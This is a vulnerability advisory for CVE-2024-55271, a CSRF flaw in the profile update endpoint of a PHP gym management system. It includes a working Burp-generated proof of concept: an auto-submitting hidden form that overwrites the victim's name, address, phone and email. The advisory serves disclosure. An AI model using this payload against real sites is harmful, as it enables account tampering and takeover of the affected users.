# Gym Management System ( CVE-2024-55271 )

A GYM management system built using PHP and MySQL.

## Auditor

Shoaib Alam - [LinkedIn Profile](https://www.linkedin.com/in/shoaib-alam-b53843203/)

## Description

### CSRF Vulnerability in Profile Update Section

A Cross-Site Request Forgery (CSRF) vulnerability has been identified in the Gym Management System. This issue is present in the profile update functionality of the User Panel.

The application currently lacks the implementation of Anti-CSRF tokens, resulting in vulnerability to Cross-Site Request Forgery (CSRF) attacks. This security weakness specifically impacts the `/profile.php` endpoint. An attacker can exploit this flaw to execute unauthorized modifications to sensitive user information, such as address, name, and phone number. This could potentially compromise the integrity of user accounts and lead to further security issues.

**Vulnerable Endpoint:** `/profile.php`

## Proof of Concept (PoC)

Below is a proof of concept demonstrating the CSRF vulnerability. This PoC was generated using Burp Suite Professional.

```html
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://localhost/gym/profile.php" method="POST">
      <input type="hidden" name="fname" value="hacked" />
      <input type="hidden" name="lname" value="victim" />
      <input type="hidden" name="email" value="attacker&#64;gmail&#46;com" />
      <input type="hidden" name="mobile" value="9999999999" />
      <input type="hidden" name="state" value="hacked" />
      <input type="hidden" name="city" value="hacked" />
      <input type="hidden" name="address" value="hacked" />
      <input type="hidden" name="submit" value="Update" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

